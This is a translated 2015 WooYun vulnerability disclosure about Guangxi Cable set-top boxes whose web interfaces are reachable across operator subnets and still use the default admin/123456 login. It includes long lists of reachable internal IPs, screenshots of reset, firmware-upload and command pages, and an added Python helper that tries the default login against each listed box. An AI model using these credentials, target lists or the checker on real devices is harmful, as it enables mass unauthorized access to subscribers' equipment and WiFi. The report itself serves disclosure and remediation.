Vulnerability Summary

Defect ID: wooyun-2015-0115728

Title: Guangxi Cable Network HD set-top box (WiFi edition) vulnerability #3: arbitrary access to more than a million set-top boxes

Affected vendor: cncert (National Internet Emergency Center)

Author: wefgod

Submitted: 2015-05-24 13:27

Fixed: 2015-08-26 18:38

Published: 2015-08-26 18:38

Type: Insecure design

Severity: High

Self-assessed Rank: 15

Status: Handed to third-party partner organisation (cncert, National Internet Emergency Center) for handling

Source: http://www.wooyun.org, for questions or assistance contact [email protected]

Tags:


Vulnerability Details

Disclosure status:

2015-05-24: Details sent to the vendor, awaiting vendor handling
2015-05-28: Vendor confirmed; details disclosed to the vendor only
2015-05-31: Details opened to third-party security partners
2015-07-22: Details opened to core white hats and domain experts
2015-08-01: Details opened to regular white hats
2015-08-11: Details opened to intern white hats
2015-08-26: Details opened to the public

Brief description:

As of 31 December 2013, the Guangxi company had 4.9181 million cable TV subscribers, of which 3.7681 million were digital TV subscribers (825,700 HD TV subscribers and 229,300 interactive TV subscribers) and 1.15 million were analogue TV subscribers.
I do not know the exact figures for 2015, but on these numbers there are certainly no fewer than one million HD set-top boxes in service today, and every internet-capable box that is powered on and connected to Guangxi Cable's coaxial network can be reached!
The two earlier vulnerabilities may be needed for this test:
http://wooyun.org/bugs/wooyun-2015-0115655
http://wooyun.org/bugs/wooyun-2015-0115665

Detailed description:

Whatever the vulnerability, exploiting it has preconditions:
1. You have an internet-capable set-top box at home (this write-up uses the HD box).
2. Your service has not been cut off by the cable operator for unpaid bills or the like.
3. You are a Guangxi Cable Network subscriber (other regions will not necessarily behave the same way).
4. Whether or not you have activated the internet service makes no difference; either way you can reach other households' boxes.
5. You still need an ordinary PC.
6. Remember the default credentials: the trivially simple admin/123456.
This report covers only the subnets used by the set-top boxes.
Back to the point. Although the operator appears to have some so-called security policies in place, port 80 is not strictly isolated (so far port 80 is the only port found to be exploitable at scale within the STB subnets), so you can reach the web interface of other households' boxes. At the same time, the vast majority of users have never changed the web interface login password: it is still the default admin/123456. As for the rest, you get the idea.
The segment I am on starts at 10.185.128.1 with subnet mask 255.255.192.0 (i.e. 10.185.128.0/18); I have tested as far as the 10.185.184.x range and there are still boxes there.
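As an added example, not code from this report or from the operator, here is a small Python audit helper for the exposure described above: it parses "ip:port" lists of the kind given in the proof section, confirms that 10.185.184.x lies inside the 10.185.128.1 / 255.255.192.0 segment named above, and classifies each box as unreachable, serving its UI with no login at all, or still accepting admin/123456. It assumes the STB web UI challenges with HTTP Basic authentication (the page shows a login but not the scheme; a form-based login would need a different request) and that it is run from inside the operator network, as the author was. The responses in the fixture are constructed for offline use, not captured traffic. The same probe, run after remediation, is the check that intra-subnet port 80 is actually blocked.

```python
"""
Audit helper for STB web UIs reachable on TCP/80 across an operator's private
10.x subnets, most still on the factory login admin/123456.
Added example, not code from the report or the operator. Assumptions:
  * the STB web UI challenges with HTTP Basic auth (not stated on the page)
  * the audit runs from a host inside the operator network
"""
import base64
import ipaddress
import re
import urllib.error
import urllib.request
from dataclasses import dataclass

DEFAULT_USER, DEFAULT_PASS = "admin", "123456"   # default credentials named in the report
LANDING_PAGES = ("/homepc.asp", "/home.asp")     # UI paths seen in the report's screenshots;
                                                 # /syscmd.asp (command page) is deliberately not touched
TARGET_RE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5})$")


def parse_targets(text):
    """Parse 'ip:port' lines (as in the per-county lists) into (IPv4Address, port)."""
    out = []
    for line in text.splitlines():
        m = TARGET_RE.match(line.strip())
        if m:
            out.append((ipaddress.IPv4Address(m.group(1)), int(m.group(2))))
    return out


def group_by_prefix(targets, prefixlen=24):
    """Count listed hosts per /24 (each county's STB pool is one or two /24s)."""
    counts = {}
    for ip, _ in targets:
        net = ipaddress.ip_network(f"{ip}/{prefixlen}", strict=False)
        counts[net] = counts.get(net, 0) + 1
    return counts


def stb_subnet(first_host, netmask):
    """Network for a host/mask pair, e.g. 10.185.128.1 / 255.255.192.0 -> 10.185.128.0/18."""
    return ipaddress.ip_network(f"{first_host}/{netmask}", strict=False)


def basic_auth_header(user, password):
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return {"Authorization": f"Basic {token}"}


@dataclass
class Finding:
    ip: str
    reachable: bool        # something answered on TCP/80
    unauthenticated: bool  # UI page served with no credentials at all
    default_login: bool    # 401 challenge, then 200 with admin/123456
    page: str = ""


def http_get(url, headers, timeout=3):
    """Real fetch: (status, body), or (None, '') when nothing answers."""
    req = urllib.request.Request(url, headers=headers)
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read(2048).decode("utf-8", "replace")
    except urllib.error.HTTPError as exc:
        return exc.code, ""
    except (urllib.error.URLError, OSError):
        return None, ""


def probe(ip, fetch=http_get):
    """Classify one STB. `fetch` is injectable so the decision logic runs offline."""
    for page in LANDING_PAGES:
        status, _ = fetch(f"http://{ip}{page}", {})
        if status is None:
            continue
        if status == 200:
            return Finding(str(ip), True, True, False, page)
        if status == 401:
            status2, _ = fetch(f"http://{ip}{page}", basic_auth_header(DEFAULT_USER, DEFAULT_PASS))
            return Finding(str(ip), True, False, status2 == 200, page)
        return Finding(str(ip), True, False, False, page)
    return Finding(str(ip), False, False, False)


def audit(text, fetch=http_get):
    """Probe every port-80 entry of a pasted 'ip:port' list, in input order."""
    return [probe(ip, fetch) for ip, port in parse_targets(text) if port == 80]


# Constructed offline fixture: hypothetical behaviour, not captured responses.
FIXTURE = {
    "10.84.16.8": "default",  # challenges, then accepts admin/123456
    "10.84.16.9": None,       # nothing listening
    "10.59.16.9": "open",     # serves the UI without any login
    "10.4.133.6": "changed",  # challenges, rejects the default password
}
SAMPLE = "10.84.16.8:80\n10.84.16.9:80\n10.59.16.9:80\n10.4.133.6:80\n"


def fake_fetch(url, headers, timeout=3):
    host = url.split("//", 1)[1].split("/", 1)[0]
    mode = FIXTURE.get(host)
    if mode is None:
        return None, ""
    if mode == "open":
        return 200, "<title>homepc</title>"
    if headers.get("Authorization") == basic_auth_header(DEFAULT_USER, DEFAULT_PASS)["Authorization"]:
        return (200, "") if mode == "default" else (401, "")
    return 401, ""


if __name__ == "__main__":
    for f in audit(SAMPLE, fake_fetch):  # use http_get instead on the real network
        print(f)
```

On a real run, paste the operator-side list into `audit(text)` and leave `fetch` at its default; only boxes reported with `default_login` or `unauthenticated` set need the password change or UI lockdown, while a run after the network fix should return `reachable=False` for every peer.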

[Screenshot: image022.png]
[Screenshot: image024.png]


Below are some screenshots of the web interfaces reached this way:

[Screenshot: image025.png]
[Screenshot: image026.png]
[Screenshot: image027.png]
[Screenshot: image028.png]
[Screenshot: image029.png]
[Screenshot: image030.png]


What can you do once you are in the web interface?
Restore factory settings:

[Screenshot: image031.png]

Reboot the box:

[Screenshot: image032.png]

Upgrade the firmware (modify the firmware and plant a backdoor????):

[Screenshot: image033.png]

Something nastier, such as blocking ports?

[Screenshot: image034.png]

We cannot telnet to other boxes, but running commands through the suspected backdoor page works fine, right?

[Screenshot: image035.png]

Finally, one more example: whose WiFi password is this? You can not only piggyback on it but also change it, heh.

[Screenshot: image036.png]

Proof of vulnerability:

Extending this a little: according to the information gathered, many other subnets also contain set-top boxes, and from what has been found so far port 80 is reachable on essentially every set-top box in all of Guangxi!
For example, the Lingshan County IP range:
http://10.84.16.8/syscmd.asp

[Screenshot: image037.png]
[Screenshot: image038.png]


http://10.84.16.188/home.asp
Other types of devices as well?

[Screenshot: image039.png]


Some of the other hosts in Lingshan County with port 80 reachable:
10.84.16.8:80
10.84.16.17:80
10.84.16.15:80
10.84.16.19:80
10.84.16.32:80
10.84.16.31:80
10.84.16.21:80
10.84.16.62:80
10.84.16.64:80
10.84.16.75:80
10.84.16.58:80
10.84.16.80:80
10.84.16.103:80
10.84.16.108:80
10.84.16.121:80
10.84.16.148:80
10.84.16.147:80
10.84.16.146:80
10.84.16.188:80
10.84.16.208:80
10.84.16.216:80
10.84.16.221:80
10.84.16.229:80
10.84.16.240:80
10.84.17.5:80
10.84.17.19:80
10.84.17.16:80
10.84.17.33:80
10.84.17.68:80
10.84.17.70:80
10.84.17.85:80
10.84.17.102:80
10.84.17.106:80
10.84.17.101:80
10.84.17.105:80
10.84.17.107:80
10.84.17.109:80
10.84.17.110:80
10.84.17.112:80
10.84.17.113:80


Hengxian range:
http://10.59.16.9/homepc.asp

[Screenshot: image040.png]


Some hosts with port 80 reachable:
10.59.16.9:80
10.59.16.17:80
10.59.16.30:80
10.59.16.2:80
10.59.16.47:80
10.59.16.56:80
10.59.16.64:80
10.59.16.63:80
10.59.16.80:80
10.59.16.78:80
10.59.16.115:80
10.59.16.131:80
10.59.16.146:80
10.59.16.145:80
10.59.16.163:80
10.59.16.171:80
10.59.16.193:80
10.59.16.190:80
10.59.16.213:80
10.59.16.205:80
10.59.16.227:80
10.59.16.229:80
10.59.17.13:80
10.59.17.10:80
10.59.17.21:80
10.59.17.90:80
10.59.17.112:80
10.59.17.114:80
10.59.17.115:80
10.59.17.140:80
10.59.17.156:80
10.59.17.165:80
10.59.17.193:80
10.59.17.187:80
10.59.17.198:80
10.59.17.184:80
10.59.17.196:80
10.59.17.208:80
10.59.17.215:80
10.59.17.229:80
10.59.17.233:80
10.59.17.250:80
10.59.18.4:80
10.59.18.21:80
10.59.18.56:80


Beihai range:
http://10.194.133.4/homepc.asp

[Screenshot: image041.png]


Some reachable IPs:
10.194.133.2:80
10.194.133.4:80
10.194.133.12:80
10.194.133.15:80
10.194.133.21:80
10.194.133.10:80
10.194.133.24:80
10.194.133.8:80
10.194.133.23:80
10.194.133.31:80
10.194.133.7:80
10.194.133.13:80
10.194.133.19:80
10.194.133.17:80
10.194.133.11:80
10.194.133.32:80
10.194.133.36:80
10.194.133.22:80
10.194.133.45:80
10.194.133.39:80
10.194.133.43:80
10.194.133.35:80
10.194.133.34:80
10.194.133.48:80
10.194.133.41:80
10.194.133.42:80
10.194.133.47:80
10.194.133.29:80
10.194.133.66:80
10.194.133.63:80
10.194.133.77:80
10.194.133.73:80
10.194.133.55:80
10.194.133.83:80
10.194.133.82:80
10.194.133.70:80
10.194.133.78:80
10.194.133.69:80
10.194.133.76:80
10.194.133.88:80
10.194.133.75:80
10.194.133.87:80
10.194.133.86:80
10.194.133.95:80
10.194.133.71:80
10.194.133.91:80
10.194.133.96:80
10.194.133.98:80
10.194.133.64:80
10.194.133.103:80
10.194.133.104:80
10.194.133.106:80
10.194.133.105:80
10.194.133.115:80
10.194.133.121:80
10.194.133.117:80
10.194.133.124:80
10.194.133.123:80
10.194.133.119:80
10.194.133.120:80
10.194.133.134:80
10.194.133.135:80
10.194.133.131:80
10.194.133.137:80
10.194.133.136:80
10.194.133.139:80
10.194.133.128:80
10.194.133.138:80
10.194.133.142:80
10.194.133.146:80
10.194.133.148:80
10.194.133.149:80
10.194.133.152:80
10.194.133.155:80
10.194.133.154:80
10.194.133.161:80
10.194.133.164:80
10.194.133.162:80
10.194.133.167:80
10.194.133.169:80
10.194.133.125:80
10.194.133.173:80
10.194.133.176:80
10.194.133.174:80
10.194.133.179:80
10.194.133.181:80
10.194.133.182:80
10.194.133.127:80
10.194.133.133:80
10.194.133.140:80
10.194.133.145:80
10.194.133.185:80
10.194.133.186:80
10.194.133.189:80
10.194.133.191:80
10.194.133.187:80
10.194.133.195:80
10.194.133.199:80
10.194.133.196:80
10.194.133.204:80
10.194.133.203:80
10.194.133.205:80
10.194.133.201:80
10.194.133.217:80
10.194.133.216:80
10.194.133.210:80
10.194.133.221:80
10.194.133.211:80
10.194.133.209:80
10.194.133.219:80
10.194.133.227:80
10.194.133.214:80
10.194.133.224:80
10.194.133.222:80
10.194.133.231:80
10.194.133.228:80
10.194.133.229:80
10.194.133.232:80
10.194.133.233:80
10.194.133.237:80
10.194.133.240:80
10.194.133.238:80
10.194.133.245:80
10.194.133.251:80
10.194.133.247:80
10.194.133.252:80


Range for the provincial capital, Nanning:
http://10.4.133.6/homepc.asp

[Screenshot: image042.png]


Some IPs with port 80 reachable:
10.4.133.6:80
10.4.133.2:80
10.4.133.18:80
10.4.133.22:80
10.4.133.17:80
10.4.133.19:80
10.4.133.11:80
10.4.133.20:80
10.4.133.27:80
10.4.133.26:80
10.4.133.24:80
10.4.133.41:80
10.4.133.44:80
10.4.133.38:80
10.4.133.39:80
10.4.133.53:80
10.4.133.59:80
10.4.133.56:80
10.4.133.63:80
10.4.133.70:80
10.4.133.78:80
10.4.133.77:80
10.4.133.82:80
10.4.133.83:80
10.4.133.93:80
10.4.133.99:80
10.4.133.101:80
10.4.133.103:80
10.4.133.113:80
10.4.133.106:80
10.4.133.111:80
10.4.133.116:80
10.4.133.118:80
10.4.133.52:80
10.4.133.54:80
10.4.133.57:80
10.4.133.55:80
10.4.133.61:80
10.4.133.60:80
10.4.133.62:80
10.4.133.65:80
10.4.133.87:80
10.4.133.84:80
10.4.133.86:80
10.4.133.71:80
10.4.133.96:80
10.4.133.81:80
10.4.133.92:80
10.4.133.121:80
10.4.133.123:80
10.4.133.125:80
10.4.133.124:80
10.4.133.128:80
10.4.133.131:80
10.4.133.135:80
10.4.133.141:80
10.4.133.142:80
10.4.133.144:80
10.4.133.145:80
10.4.133.148:80
10.4.133.151:80
10.4.133.152:80
10.4.133.155:80
10.4.133.156:80
10.4.133.160:80
10.4.133.164:80
10.4.133.167:80
10.4.133.171:80
10.4.133.168:80
10.4.133.178:80
10.4.133.172:80
10.4.133.173:80
10.4.133.183:80
10.4.133.184:80
10.4.133.194:80
10.4.133.193:80
10.4.133.196:80
10.4.133.197:80
10.4.133.189:80
10.4.133.199:80
10.4.133.206:80
10.4.133.204:80
10.4.133.205:80
10.4.133.209:80
10.4.133.210:80
10.4.133.214:80
10.4.133.224:80
10.4.133.221:80
10.4.133.226:80
10.4.133.222:80
10.4.133.232:80
10.4.133.234:80
10.4.133.240:80
10.4.133.243:80
10.4.133.245:80
10.4.133.244:80
10.4.133.249:80
10.4.133.251:80
10.4.134.5:80
10.4.133.186:80
10.4.133.185:80
10.4.134.12:80
10.4.134.16:80
10.4.134.20:80
10.4.134.23:80
10.4.134.26:80
10.4.134.28:80
10.4.134.31:80
10.4.134.34:80
10.4.134.35:80
10.4.134.37:80
10.4.134.36:80
10.4.134.39:80
10.4.134.3:80
10.4.134.42:80
10.4.134.45:80
10.4.134.46:80
10.4.134.50:80
10.4.134.54:80
10.4.134.56:80
10.4.134.60:80
10.4.134.58:80
10.4.134.61:80
10.4.134.57:80
10.4.134.63:80
10.4.134.67:80
10.4.134.66:80
10.4.134.71:80
10.4.134.65:80
10.4.134.72:80
10.4.134.73:80
10.4.134.79:80
10.4.134.86:80
10.4.134.87:80
10.4.134.90:80
10.4.134.92:80
10.4.134.101:80
10.4.134.100:80
10.4.134.104:80
10.4.134.109:80
10.4.134.115:80
10.4.134.117:80
10.4.134.122:80
10.4.134.119:80
10.4.134.121:80
10.4.134.123:80
10.4.134.125:80
10.4.134.127:80
10.4.134.130:80
10.4.134.132:80
10.4.134.133:80
10.4.134.137:80
10.4.134.140:80
10.4.134.142:80
10.4.134.143:80
10.4.134.145:80
10.4.134.152:80
10.4.134.158:80
10.4.134.157:80
10.4.134.159:80
10.4.134.165:80
10.4.134.168:80
10.4.134.172:80
10.4.134.173:80
10.4.134.178:80
10.4.134.179:80
10.4.134.182:80
10.4.134.181:80
10.4.134.184:80
10.4.134.185:80
10.4.134.186:80
10.4.134.187:80
10.4.134.190:80
10.4.134.203:80
10.4.134.206:80
10.4.134.207:80
10.4.134.211:80
10.4.134.214:80
10.4.134.216:80
10.4.134.217:80
10.4.134.219:80
10.4.134.222:80
10.4.134.220:80
10.4.134.226:80
10.4.134.224:80
10.4.134.225:80
10.4.134.233:80
10.4.134.236:80
10.4.134.239:80
10.4.134.242:80
10.4.134.245:80
10.4.134.246:80
10.4.134.252:80


Finally, one more test on the Laibin range. The others are reachable as well, but a whole /8 is too large to go through, so I did not go any further.
http://10.241.131.7/homepc.asp

[Screenshot: image043.png]


10.241.131.7:80
10.241.131.8:80
10.241.131.3:80
10.241.131.11:80
10.241.131.10:80
10.241.131.12:80
10.241.131.19:80
10.241.131.14:80
10.241.131.18:80
10.241.131.22:80
10.241.131.15:80
10.241.131.25:80
10.241.131.21:80
10.241.131.23:80
10.241.131.30:80
10.241.131.26:80
10.241.131.31:80
10.241.131.36:80
10.241.131.35:80
10.241.131.32:80
10.241.131.27:80
10.241.131.39:80
10.241.131.43:80
10.241.131.42:80
10.241.131.45:80
10.241.131.46:80
10.241.131.48:80
10.241.131.44:80
10.241.131.49:80
10.241.131.51:80
10.241.131.50:80
10.241.131.53:80
10.241.131.56:80
10.241.131.72:80
10.241.131.69:80
10.241.131.67:80
10.241.131.68:80
10.241.131.79:80
10.241.131.81:80
10.241.131.83:80
10.241.131.77:80
10.241.131.55:80
10.241.131.84:80
10.241.131.86:80
10.241.131.76:80
10.241.131.90:80
10.241.131.95:80
10.241.131.88:80
10.241.131.97:80
10.241.131.99:80
10.241.131.96:80
10.241.131.52:80
10.241.131.101:80
10.241.131.104:80
10.241.131.102:80
10.241.131.110:80
10.241.131.105:80
10.241.131.113:80
10.241.131.112:80
10.241.131.108:80
10.241.131.114:80
10.241.131.122:80
10.241.131.121:80
10.241.131.119:80
10.241.131.124:80
10.241.131.128:80
10.241.131.127:80
10.241.131.136:80
10.241.131.130:80
10.241.131.138:80
10.241.131.144:80
10.241.131.140:80
10.241.131.146:80
10.241.131.141:80
10.241.131.151:80
10.241.131.139:80
10.241.131.150:80
10.241.131.163:80
10.241.131.165:80
10.241.131.156:80
10.241.131.160:80
10.241.131.161:80
10.241.131.172:80
10.241.131.166:80
10.241.131.177:80
10.241.131.179:80
10.241.131.181:80
10.241.131.183:80
10.241.131.185:80
10.241.131.186:80
10.241.131.188:80
10.241.131.187:80
10.241.131.189:80
10.241.131.190:80
10.241.131.192:80
10.241.131.194:80
10.241.131.196:80
10.241.131.198:80
10.241.131.208:80
10.241.131.205:80
10.241.131.210:80
10.241.131.211:80
10.241.131.213:80
10.241.131.202:80
10.241.131.218:80
10.241.131.215:80
10.241.131.222:80
10.241.131.225:80
10.241.131.224:80
10.241.131.223:80
10.241.131.226:80
10.241.131.232:80
10.241.131.235:80
10.241.131.236:80
10.241.131.239:80
10.241.131.240:80
10.241.131.243:80
10.241.131.238:80
10.241.131.245:80
10.241.131.248:80
10.241.131.252:80
10.241.132.4:80
10.241.131.253:80
10.241.132.8:80
10.241.132.2:80
10.241.132.3:80
10.241.132.9:80
10.241.132.11:80
10.241.132.6:80
10.241.132.16:80
10.241.132.20:80
10.241.132.23:80
10.241.132.25:80
10.241.132.29:80
10.241.132.28:80
10.241.132.30:80
10.241.132.33:80
10.241.132.35:80
10.241.132.34:80
10.241.132.39:80
10.241.132.38:80
10.241.132.40:80
10.241.132.43:80
10.241.132.44:80
10.241.132.48:80
10.241.132.53:80
10.241.132.54:80
10.241.132.55:80
10.241.132.59:80
10.241.132.62:80
10.241.132.60:80
10.241.132.63:80
10.241.132.64:80
10.241.132.61:80
10.241.132.66:80
10.241.132.69:80
10.241.132.71:80
10.241.132.72:80
10.241.132.75:80
10.241.132.78:80
10.241.132.81:80
10.241.132.86:80
10.241.132.90:80
10.241.132.88:80
10.241.132.92:80
10.241.132.94:80
10.241.132.96:80
10.241.132.97:80
10.241.132.99:80
10.241.132.103:80
10.241.132.108:80
10.241.132.111:80
10.241.132.113:80
10.241.132.116:80
10.241.132.117:80
10.241.132.120:80
10.241.132.121:80
10.241.132.124:80
10.241.132.125:80
10.241.132.131:80
10.241.132.134:80
10.241.132.135:80
10.241.132.138:80
10.241.132.139:80
10.241.132.136:80
10.241.132.140:80
10.241.132.133:80
10.241.132.141:80
10.241.132.144:80
10.241.132.145:80
10.241.132.147:80
10.241.132.143:80
10.241.132.151:80
10.241.132.152:80
10.241.132.158:80
10.241.132.159:80
10.241.132.164:80
10.241.132.165:80
10.241.132.168:80
10.241.132.170:80
10.241.132.172:80
10.241.132.171:80
10.241.132.175:80
10.241.132.176:80
10.241.132.178:80
10.241.132.181:80
10.241.132.180:80
10.241.132.182:80
10.241.132.183:80
10.241.132.185:80
10.241.132.186:80
10.241.132.187:80
10.241.132.189:80
10.241.132.191:80
10.241.132.196:80
10.241.132.198:80
10.241.132.203:80
10.241.132.205:80
10.241.132.204:80
10.241.132.210:80
10.241.132.209:80

Remediation:

Implement proper network isolation: hosts within the set-top box subnets must not be able to reach each other on port 80.

Copyright notice: when reposting, please credit the source: wefgod@乌云


Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 13

Confirmed: 2015-05-28 18:36

Vendor reply:

CNVD has confirmed the described situation and has forwarded it via CNCERT to the Guangxi branch, which will coordinate handling with the operating unit.

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2015-05-24 19:45 | GrayTrack ( Intern white hat | Rank:75 Vulnerabilities:14 | Grey Trail)

    Mind-blowing.

  2. 2015-05-24 22:20 | sco4x0 ( Intern white hat | Rank:31 Vulnerabilities:13 | O_o)

    Fleecing the same sheep over and over is going to get you into trouble.

  3. 2015-05-29 06:36 | scanf ( Core white hat | Rank:1232 Vulnerabilities:186 | 。)

    I'll go and sign up for their broadband service on Sunday as well.

  4. 2015-05-30 15:29 | wefgod ( Regular white hat | Rank:1807 Vulnerabilities:179 | More than I can handle)

    @scanf I haven't signed up.

  5. 2015-08-26 19:32 | ddbug ( Passer-by | Rank:18 Vulnerabilities:9 )

    @wefgod So that means you're from Guangxi...